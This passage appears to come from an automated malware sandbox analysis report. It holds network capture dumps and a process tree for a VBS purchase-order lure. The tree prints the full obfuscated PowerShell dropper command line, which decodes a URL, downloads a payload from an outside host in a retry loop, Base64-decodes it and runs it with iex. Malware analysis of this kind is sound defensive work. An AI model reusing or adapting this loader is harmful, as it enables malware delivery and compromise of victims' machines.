                                    2024-07-01 13:37:08 UTC8000INData Raw: 79 41 78 37 34 46 79 33 59 34 37 6f 50 77 38 49 66 30 6e 48 72 73 59 50 31 2f 7a 65 37 4a 68 68 77 4d 32 2f 71 4e 2b 34 64 41 79 4f 33 52 59 41 6a 39 6d 4b 55 39 6d 6e 4b 34 61 78 48 55 51 4f 78 45 4c 6c 43 61 37 50 74 47 32 62 62 58 6d 35 58 32 6e 4b 47 6f 41 49 37 73 4d 6d 79 61 79 30 4c 67 4e 57 66 43 51 59 6b 4f 64 41 48 2b 6d 42 52 67 6f 73 4e 67 6d 44 57 2f 30 61 41 37 57 4a 65 42 32 70 33 55 59 4b 4c 62 5a 61 31 37 57 4a 52 67 75 31 69 57 48 6a 46 48 49 33 71 36 32 63 6c 42 57 78 57 64 61 35 72 7a 31 50 52 56 6e 78 74 4f 6f 76 6a 6f 6b 64 70 6d 44 55 44 48 70 67 30 39 6f 76 6a 6b 68 42 64 58 6c 4d 44 48 74 48 64 38 59 73 7a 7a 51 73 4d 61 30 67 66 31 4a 73 6a 67 64 69 51 30 51 56 55 76 79 4a 73 38 34 4b 33 6f 38 73 76 6d 56 57 43 76 36 42 4f 4b 44
                                    Data Ascii: yAx74Fy3Y47oPw8If0nHrsYP1/ze7JhhwM2/qN+4dAyO3RYAj9mKU9mnK4axHUQOxELlCa7PtG2bbXm5X2nKGoAI7sMmyay0LgNWfCQYkOdAH+mBRgosNgmDW/0aA7WJeB2p3UYKLbZa17WJRgu1iWHjFHI3q62clBWxWda5rz1PRVnxtOovjokdpmDUDHpg09ovjkhBdXlMDHtHd8YszzQsMa0gf1JsjgdiQ0QVUvyJs84K3o8svmVWCv6BOKD


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.650573192.185.112.2524432264C:\Program Files (x86)\Windows Mail\wab.exe
                                    TimestampBytes transferredDirectionData
                                    2024-07-01 13:37:40 UTC181OUTGET /New/New/mVbkq170.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: contemega.com.do
                                    Cache-Control: no-cache
                                    2024-07-01 13:37:40 UTC301INHTTP/1.1 200 OK
                                    Date: Mon, 01 Jul 2024 13:37:40 GMT
                                    Server: Apache
                                    Upgrade: h2,h2c
                                    Connection: Upgrade, close
                                    Last-Modified: Mon, 01 Jul 2024 02:12:54 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 494656
                                    content-Security-Policy: upgrade-insecure-requests
                                    Content-Type: application/octet-stream
                                    2024-07-01 13:37:40 UTC7891INData Raw: b2 41 79 e6 61 e8 f0 2d a4 59 a4 bf 9c a5 6c 85 48 3d 87 16 d3 42 3c 24 f3 aa 11 44 02 70 82 ec 09 8c 64 0f 1c 1a 23 ff 35 57 e2 d5 30 ca e8 3b 7b 0c f9 18 f0 02 dd 94 54 a0 92 62 31 ef 79 87 5d 44 3b d2 54 2a 33 69 13 4e 2f 73 70 ce 2f 47 d6 e0 24 c3 17 08 f8 ed 85 9d f8 0e 38 97 b5 cf a2 07 81 46 29 3e c1 22 a3 fa b6 b7 03 e1 24 79 6f 9c 64 de 5c 32 46 c1 cb d9 10 94 01 37 70 1f b0 7c 33 71 26 2d 8a 9f 05 68 70 ba 03 1b d3 39 2a 3d 65 fe a7 6a 4b 24 b8 61 fc 71 ce 07 6f df b4 77 3e bf 04 11 6b d5 fb 33 6e 61 d1 a5 e8 c2 a5 e3 f7 6c f5 0c 09 7f b0 7b 21 09 96 70 d3 86 68 36 60 c7 85 df fe a3 c5 91 81 46 55 27 e6 1f ea 73 f6 de 94 b2 64 79 2b 2b 03 0d c6 0b de 10 98 f4 c0 7f 88 ce 64 b2 7f de cb 8b 07 2c 35 a8 a6 c6 e7 ef 91 65 d4 13 65 68 c8 7e ac 86 d0
                                    Data Ascii: Aya-YlH=B<$Dpd#5W0;{Tb1y]D;T*3iN/sp/G$8F)>"$yod\2F7p|3q&-hp9*=ejK$aqow>k3nal{!ph6`FU'sdy++d,5eeh~
                                    2024-07-01 13:37:40 UTC8000INData Raw: b5 60 91 4a 7c 26 3a 12 6f e2 b5 1e 15 ba 23 bc 3b f0 46 f0 34 cf 43 ab 37 bf 2e 36 d2 17 aa 75 6e f4 53 34 d7 d2 0d ec ef 3f 14 a2 48 8f 5e b0 dc 74 74 d0 16 1b d7 24 c6 db 9b 73 64 b2 d9 77 5a 8a 25 41 44 75 97 f5 b1 87 13 3f f5 3d 50 b1 bc 20 f1 65 f1 03 e0 af 52 3d ae 65 1b 28 14 64 61 79 87 07 52 66 d1 7d d4 d2 01 c2 30 98 2d 17 99 9d d9 ba e4 b2 73 03 84 30 e5 19 cc 9c b5 56 c4 94 be 52 a2 15 c8 3e 6a 51 95 22 85 69 b2 b9 01 e8 f6 fa a4 9c 29 93 dc 96 67 1f bb d8 d4 47 15 1e 6d f0 0b 0f 6b c5 25 92 ff 7a 4a 0e 7c 29 e7 af da 29 48 c9 f3 1d 00 ec e2 ac 93 93 5e 32 47 eb 77 74 7b 20 90 bc 4a f0 a0 ee 3e 0c 39 0d c8 92 fb 6f 82 1c 86 90 a6 a3 4c df 32 5f 2c cb e8 df ab b2 ef a2 6c 75 1f d1 4e 99 58 b6 50 42 b8 5d ee 85 21 5b b8 eb a8 6d 7d 00 1d 3b d9
                                    Data Ascii: `J|&:o#;F4C7.6unS4?H^tt$sdwZ%ADu?=P eR=e(dayRf}0-s0VR>jQ"i)gGmk%zJ|))H^2Gwt{ J>9oL2_,luNXPB]![m};
                                    2024-07-01 13:37:40 UTC8000INData Raw: 7a cf da eb 30 33 cd 6a 05 3b 61 dc 62 b5 ee 8a 45 f1 e6 5f 62 d6 b7 c2 ef 23 78 28 f7 52 6b f3 f5 25 57 f7 21 1c f8 3c c6 00 c1 e8 9d 7c 0b 07 76 fe 11 32 d8 1a 62 3a d3 28 f4 86 e0 dd c3 0d a3 d5 5c 3c 37 1b 8f 4d eb fc eb 79 06 f5 53 cb cc 59 82 7e b9 9b 8f 40 22 64 03 53 fe 7e ff 9f 32 eb 29 b1 c6 25 c1 0a 85 cd 3a 36 30 47 26 8b c2 e3 0c 2d e7 68 b8 77 07 0a 48 bf e8 b1 21 c9 c0 69 57 51 ef 21 ba 45 76 31 ed 8d 52 cc 27 36 c0 cc 81 b0 f8 cf cf 4e 36 79 5b 42 ee b6 32 2a 4e 79 be 93 11 af 4b 83 1c 28 8d d1 5d 9d 70 3f c3 5d 26 ed 41 95 82 f7 28 c5 d8 f5 95 85 dc 8a 57 1a 6c c6 0c ce ea 2a e2 9b 09 e1 9d 76 d2 74 10 88 f8 73 26 91 dd 4b fa 40 3a 37 08 03 cc 43 9b a1 b0 59 c4 b4 9a 42 c3 15 5c b9 be 74 29 a0 c1 4c 03 95 98 d2 7f 66 29 55 f7 88 c3 a3 98
                                    Data Ascii: z03j;abE_b#x(Rk%W!<|v2b:(\<7MySY~@"dS~2)%:60G&-hwH!iWQ!Ev1R'6N6y[B2*NyK(]p?]&A(Wl*vts&K@:7CYB\t)Lf)U
                                    2024-07-01 13:37:40 UTC8000INData Raw: 88 1e a3 af 23 d6 64 96 e7 ad a5 a2 7d 42 88 62 5a f6 a2 29 be bb b1 39 89 95 8b bc a8 a6 06 38 6c fd 57 e8 1f 66 b9 ad 17 18 16 46 ad 9d 0f 23 d7 70 d8 b8 aa d6 94 d7 2c 75 1a 9e 8c 5e dc 79 d6 6e 5f 15 2a 5a 11 43 9e 0d 1b d1 56 50 54 1c e2 43 d2 1d 5c cc 52 01 cf 6b 69 00 a1 6b 40 cf 29 16 69 d7 71 3c 43 84 5d 6d b6 eb 43 b7 a6 b1 f4 50 78 c6 8b e3 f0 b2 2c af f3 3a fb e5 97 38 43 f6 97 67 6b 56 e4 a1 22 e3 61 99 5c 34 78 4d f9 8f de 87 1e a7 e1 69 5c 34 68 8e c8 d3 da b6 32 cb b0 00 d7 40 4c e1 cb 60 4c 38 d6 da fa 35 26 bf 9e 3f 19 1c e1 8b 71 ad cd d0 f6 fd 85 9e f5 50 fd 16 2c ba 3f 27 4f 67 eb 6d ff 90 32 20 3c 2d d2 ab 54 2d dc fc b8 a1 ff 28 61 71 8f ba 43 63 76 6d 61 38 47 81 bc c9 d9 75 6d d3 3a 97 36 0b ae 8c 71 2c 2c 67 fa cb d5 f6 3c b3 1a
                                    Data Ascii: #d}BbZ)98lWfF#p,u^yn_*ZCVPTC\Rkik@)iq<C]mCPx,:8CgkV"a\4xMi\4h2@L`L85&?qP,?'Ogm2 <-T-(aqCcvma8Gum:6q,,g<
                                    2024-07-01 13:37:40 UTC8000INData Raw: 0e e9 cb ea 58 87 b8 ba 63 24 a4 53 e5 fc 67 17 1b e0 3b 6e e2 44 58 ec ba 0b 4e 7c cc 2e cb 9b b9 c6 88 42 5b 93 57 56 b4 83 54 2c 81 0c cc c0 42 d7 31 e7 2f a5 95 f0 2d 23 fc 26 bd 2c 37 63 fa d2 e5 3f 8a 91 5e 5f 52 fb d3 ea b9 18 a3 9c a9 a0 15 36 2a df f7 3d 59 98 e2 28 b1 8e 4c 07 32 2e 4d 20 06 5e ef b3 66 53 10 1c 31 bd 1c 90 f7 96 42 e2 4a ca 71 85 b1 9b 99 a5 17 08 b0 62 10 1b 91 16 ad 89 d6 fd e8 fe b3 78 0b c4 37 4d 7e 5d e7 c5 9c ec fd ca 99 a5 5a e2 47 60 60 86 ee ff 41 c6 de ca ad 4b 46 6f ce 51 29 13 0d f8 98 0e ec fb f3 61 60 3f 2b 4d 97 d2 b8 25 16 22 f3 b7 5d ec 46 e2 6b 77 4e 8f 84 84 b1 f6 b6 ba 62 1f ea 47 91 42 fe 8d 5f c7 c7 78 63 9a ef b2 c9 c9 e2 0d b9 d1 5a 48 42 f0 66 73 78 c4 53 a2 63 bb fd 81 1e b4 8f ef 95 19 27 0f ac 0f ad
                                    Data Ascii: Xc$Sg;nDXN|.B[WVT,B1/-#&,7c?^_R6*=Y(L2.M ^fS1BJqbx7M~]ZG``AKFoQ)a`?+M%"]FkwNbGB_xcZHBfsxSc'
                                    2024-07-01 13:37:40 UTC8000INData Raw: 6f b0 f6 7f 57 6f 0f e9 5b 92 d7 80 02 e1 e3 5a bb 67 40 b0 93 6c f2 70 b9 5e 0b 75 f6 c1 c2 ba 41 89 63 7d ea 11 cd b5 9f 03 db 29 35 36 17 e3 6c 3f 85 f9 30 de 16 92 c3 81 13 00 2d 93 34 25 75 f8 26 4e 09 69 cc 71 03 1a d3 40 31 1e a2 28 b1 d2 82 1e ae bd 52 1a 60 b2 1b bc 25 7e 7f 6c 91 8d d2 ae f1 9b 0f 5c 50 6f 61 18 cc 94 d3 63 41 21 c4 ac 36 f7 ba 38 81 62 de 42 8d 6c ab a2 97 75 e7 f7 b9 cd 78 64 c5 e9 f8 73 fb 1d ff ff 37 b5 04 be ce f5 53 77 43 0f 4d 0c d8 10 2c 8f 57 24 44 32 22 c6 f1 1b 71 3b af 52 ef 5e e6 12 f6 7a 33 78 ba 8c 6b 6d 68 59 fe d4 59 0f 21 e8 99 29 78 e0 b1 a9 0d 22 76 bd d4 45 d3 79 77 7f 52 4a 71 59 d8 b7 c1 c3 a9 3a c7 6a 70 5b ec d8 87 31 fa f6 63 0b ee 57 09 b3 42 91 59 81 2d 23 dc 66 fd 4a 17 0c 70 eb ac 76 07 01 0d 53 25
                                    Data Ascii: oWo[Zg@lp^uAc})56l?0-4%u&Niq@1(R`%~l\PoacA!68bBluxds7SwCM,W$D2"q;R^z3xkmhYY!)x"vEywRJqY:jp[1cWBY-#fJpvS%
                                    2024-07-01 13:37:40 UTC8000INData Raw: 70 14 65 6c fe 03 67 4b 18 65 d7 2c e9 9a f0 c4 56 3b 49 fa aa 28 18 b6 c3 9c 16 69 2b e6 42 eb 05 c6 2d 45 f2 00 d3 6c 74 04 2b 10 21 18 61 b8 86 7d 56 85 62 5a f6 ba 29 db 91 be 2e 31 35 74 ce b4 26 db f8 c9 fd 4a 77 e1 99 34 6d e2 20 7e e1 ba 5a 3f 0a a5 3e 90 dd 30 ca c2 bf 9c 44 d1 d3 8c 3b 9f 24 29 12 22 02 4f c3 df 53 31 91 6d f8 90 dd 94 b9 0a fd 3e a2 94 eb 20 b3 cc 8f af f3 3e d2 10 bb f3 8e e0 25 8e 46 0e bd 86 08 a4 b5 37 87 7b 14 b6 b9 37 70 32 9f 85 11 0f 63 f5 92 4e ce 9b 83 94 5c 4d a1 51 35 9a 7d 10 f4 6d 5f 03 6a 77 68 d0 5d e3 a8 92 62 0d d6 c5 57 7b b5 7a fc db fd cf 34 4f 3b a1 a5 c7 09 fb 8f 63 4a cb da c1 58 ed 40 38 ed 59 da d1 8b 8c 40 cd d0 2f 46 b4 fe ed d8 70 d9 c6 2f af 00 ac 76 14 7a 50 f3 67 c1 33 3a fb 14 c3 ba 33 6c 33 81
                                    Data Ascii: pelgKe,V;I(i+B-Elt+!a}VbZ).15t&Jw4m ~Z?>0D;$)"OS1m> >%F7{7p2cN\MQ5}m_jwh]bW{z4O;cJX@8Y@/Fp/vzPg3:3l3
                                    2024-07-01 13:37:40 UTC8000INData Raw: a5 21 c0 4a 11 12 fe ae 87 33 ba 7a 2c 1f fd 02 9f 95 e5 0d c6 b4 5b 15 62 7a 40 9a c9 57 1c 43 04 fb 08 80 21 6b 3f 3e fd 70 27 fc b6 69 a6 b0 88 2d a1 ce b9 a7 fd 02 56 69 91 e1 42 20 c3 3a 66 12 00 df 10 23 c0 3c a2 1c 7b 88 51 42 c7 fd 69 4c 90 2e 81 57 81 5a 38 56 f7 18 e4 54 40 f6 d1 80 d7 ba c7 3a c3 6a 56 20 e5 da d4 d8 9d 85 98 81 18 c0 c1 23 ed f1 5d 4c 19 08 4f 23 a1 0f 5a 0b 3a af 21 a8 1d 41 fd bb 33 9d 01 55 36 c7 f0 d9 92 7c e4 c0 b9 7f d0 c0 73 21 f1 62 6d 80 05 4a 41 4c eb 33 78 ed b3 76 61 fa 6b e1 45 14 8e f5 c5 28 e0 2f ef 0d 7e fc ee 95 03 2d 68 9c 31 c0 80 30 87 5a 08 bd 39 bb c3 1c 49 46 57 9f 1f a3 40 ad e1 1c c9 28 3f ff e5 63 3e e8 f5 13 9c e6 0e 92 dd 87 9c d0 3c a1 93 69 81 92 48 35 5f 4a b6 51 b6 c8 e0 15 cc bd 4e 9f 09 57 4a
                                    Data Ascii: !J3z,[bz@WC!k?>p'i-ViB :f#<{QBiL.WZ8VT@:jV #]LO#Z:!A3U6|s!bmJAL3xvakE(/~-h10Z9IFW@(?c><iH5_JQNWJ
                                    2024-07-01 13:37:40 UTC8000INData Raw: 28 bf 93 42 28 22 e9 f9 f2 3a e3 2f 9c ee 12 c9 f0 54 bd e5 eb df a0 18 49 6b c0 f2 db 00 29 65 83 89 1a 37 04 42 44 8d e8 ec ef 0f e9 d0 45 3c 70 e8 fa 38 b1 60 50 bd 3b 07 29 f2 91 61 6e ab 01 95 48 66 31 23 f3 55 8a 73 86 27 47 a0 88 10 2a cc 3c 2b f5 69 8f ba 62 03 22 2f e4 e7 2e fa 61 f8 cb df 51 b2 2c bd d3 e2 ad 22 57 74 b5 d3 bf c3 bd 82 87 ab 31 7c 95 b3 c0 8b 92 a5 be 1a 75 4d 7a 6c 6c f2 b9 09 41 5b ff 78 0f 7b 77 4a 7f 4f 4f 9b 32 9c 77 83 ac 35 25 46 8b 5a 22 d8 0f 56 44 5f 8a 17 ae 3c 94 eb 0d 60 ed b3 52 8c 98 63 29 48 9e 67 bd 80 ee 8b 28 f7 b9 b3 18 1c 2d 7e 6b 67 35 fd 65 76 e9 f9 1b 4d f4 81 4f 98 e3 26 0e c3 32 fa bb 06 ce f2 c1 c6 09 a4 55 01 f8 a6 dc 6a 5b 3e d2 6f 3a 82 72 e2 f7 04 f6 7f 4c 7c 0b c4 27 3c 27 e8 93 a2 7f 6e b1 1a f5
                                    Data Ascii: (B(":/TIk)e7BDE<p8`P;)anHf1#Us'G*<+ib"/.aQ,"Wt1|uMzllA[x{wJOO2w5%FZ"VD_<`Rc)Hg(-~kg5evMO&2Uj[>o:rL|'<'n
                                    2024-07-01 13:37:40 UTC8000INData Raw: d9 dc 34 4a d9 57 f5 a5 73 c6 f7 dc 4d b0 77 0a 6c 21 21 4f 28 ea 74 c9 04 62 9d 01 64 0d 1c ee 83 76 db 91 b0 1e 86 73 04 7b 54 b7 c6 d8 08 e7 a8 dc 9a b0 6d 89 31 a1 42 db 04 88 0f 93 e8 cc f1 6b 59 bc 91 4e 62 ce d1 a5 e8 58 20 e0 f8 ba d2 54 1b 01 a5 77 98 c3 0c cc b4 80 11 06 db 89 e2 4b fb 27 76 ce 12 9e d0 2a 21 15 ec a4 de 12 25 48 da c8 9d b6 2f a6 e7 b6 29 1b 28 35 e7 be 4f 3a 14 e8 a3 61 34 2c c8 71 45 a8 a1 15 2b b2 c1 d3 61 79 04 fa 6f c8 e5 64 f7 15 0e 05 01 eb fb 01 31 93 93 e1 c1 7b bf 51 e6 6d 36 60 71 d6 c6 58 c8 85 b1 35 58 8c 6d fc 97 77 df 27 8e e2 84 fe a3 19 64 cc a6 26 4d 8d ef 63 cf 68 b8 22 e2 d5 64 36 8e 0b 19 34 71 08 55 63 49 dc 2e 1e f4 92 00 99 8a bd f7 a1 b6 cb cf 34 4f 5c 04 7b 81 09 76 89 e3 4a cb d6 c1 04 da 41 38 39 99
                                    Data Ascii: 4JWsMwl!!O(tbdvs{Tm1BkYNbX TwK'v*!%H/)(5O:a4,qE+ayod1{Qm6`qX5Xmw'd&Mch"d64qUcI.4O\{vJA89


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:09:37:02
                                    Start date:01/07/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs"
                                    Imagebase:0x7ff665920000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:09:37:03
                                    Start date:01/07/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s + +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes (Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood 'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT( $HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK: HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes $Hytteholds;"
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:09:37:03
                                    Start date:01/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:09:37:05
                                    Start date:01/07/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
                                    Imagebase:0x7ff796e60000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:09:37:11
                                    Start date:01/07/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s + +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') 